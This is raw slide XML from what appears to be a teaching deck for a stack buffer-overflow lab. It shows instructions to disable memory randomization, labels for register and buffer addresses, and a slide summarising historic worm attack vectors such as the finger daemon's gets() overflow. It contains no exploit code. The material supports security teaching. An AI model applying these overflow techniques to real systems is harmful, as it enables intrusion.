                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10635461" y="4689158"/>
                <a:ext cx="229320" cy="151920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC39A007-C427-ED9A-7D3B-107BCFBBD67F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10626461" y="4680158"/>
                  <a:ext cx="246960" cy="169560"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06F492C-74EE-2766-94D2-483B52997FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126546" y="358722"/>
            <a:ext cx="3175421" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn memory randomization off</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC0D511-7799-D351-25D1-9796F80D89F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895678" y="2860165"/>
            <a:ext cx="7258718" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and &amp;buffer. Both messages should keep the same addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2642911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F23F4-C4F7-6216-8C54-C7F02DE9D8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689492" y="1301176"/>
            <a:ext cx="5166808" cy="1714649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F4AB7D-F501-4B0B-7859-0E9189B28520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689492" y="3901658"/>
            <a:ext cx="5380186" cy="1752752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B94A453-9E53-81C5-F9D3-9E395293F91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049628" y="2131508"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C5114A-8669-D520-BE5F-C935B5A82942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972777" y="4357161"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D11173E-7139-BA10-0B7C-A6AB3DD00762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3127560" y="2365825"/>
            <a:ext cx="602640" cy="2796480"/>
            <a:chOff x="849581" y="2614478"/>
            <a:chExt cx="602640" cy="2796480"/>
          </a:xfrm>
        </p:grpSpPr>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20E1DF71-A5B0-E132-18C9-1CF2522B0921}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="849581" y="2614478"/>
                <a:ext cx="602640" cy="2660400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E1DF71-A5B0-E132-18C9-1CF2522B0921}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="831581" y="2596838"/>
                  <a:ext cx="638280" cy="269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23FBC670-1027-C262-E8EB-F6CC1F816832}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1212101" y="5085158"/>
                <a:ext cx="218520" cy="325800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="11" name="Ink 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FBC670-1027-C262-E8EB-F6CC1F816832}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1194101" y="5067518"/>
                  <a:ext cx="254160" cy="361440"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1583311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5CD43-FEF2-762B-D589-92AF871F5BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071266" y="3429000"/>
            <a:ext cx="6221919" cy="2908846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F437FA3-454C-6630-7EB9-09ED31E3F0CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196244" y="1745622"/>
            <a:ext cx="3581710" cy="647756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF7715B-2CA9-71F8-5AB7-A245A99CAF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290988" y="2011478"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE5B1E8F-5A74-3D8E-C8F0-F57AF2A78B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290988" y="3955482"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB51A60A-330F-866E-B1A3-FEEB8868DEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2523653" y="2196144"/>
            <a:ext cx="602640" cy="1991336"/>
            <a:chOff x="849581" y="2614478"/>
            <a:chExt cx="602640" cy="2796480"/>
          </a:xfrm>
        </p:grpSpPr>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ACF57679-9900-EC19-BA3D-1B36826CF73A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="849581" y="2614478"/>
                <a:ext cx="602640" cy="2660400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF57679-9900-EC19-BA3D-1B36826CF73A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="831581" y="2589203"/>
                  <a:ext cx="638280" cy="271044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C40B8DD4-4D3B-E687-547F-D101C00F54A4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1212101" y="5085158"/>
                <a:ext cx="218520" cy="325800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40B8DD4-4D3B-E687-547F-D101C00F54A4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1194101" y="5060369"/>
                  <a:ext cx="254160" cy="375884"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337694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29F4-5401-67FE-E425-043F3EF30F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E361F6AC-044E-48E0-3BAD-CBD0C8EBC6B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>through a "hole" or "bug" (an error) in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a computer program that transfers and receives electronic mail on a computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>deamon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to find users’ information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>through a bug in the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>deamon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>" program (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the lab focuses on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a program that permits a person to query limited information about the users of another computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>read a user’s query (input) using an old version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gets() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>—into a 512-byte buffer on the stack (buffer overflow, think about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>through the "trusted hosts" feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>which permits a user with certain privileges on one computer to have equivalent privileges on another computer without using a password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>); and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>through a program of password guessing, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>whereby various combinations of letters are tried out in rapid sequence in the hope that one will be an authorized user's password, which is entered to permit whatever level of activity that user is authorized to perform.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32019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DF738-F44A-72F4-BD0B-3FA30C546E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3034737" y="708424"/>
            <a:ext cx="5578323" cy="2720576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365FCEBA-ED7F-F421-3E1E-AD13284C356C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2927646" y="3854485"/>
            <a:ext cx="5410669" cy="2758679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB51571-C633-2090-9EA3-88DE62524950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095034" y="1850154"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E9A777-A44A-9A58-BCD2-924E6C9A9A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018183" y="4075807"/>
            <a:ext cx="1055077" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2586FFB1-F389-7CE1-BC9E-B5E98222D527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2199133" y="2494547"/>
            <a:ext cx="602640" cy="3381013"/>
            <a:chOff x="849581" y="2614478"/>
            <a:chExt cx="602640" cy="2796480"/>
          </a:xfrm>
        </p:grpSpPr>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FCD883A8-63EE-5A27-DBDF-E4019AEDFB0F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="849581" y="2614478"/>
                <a:ext cx="602640" cy="2660400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
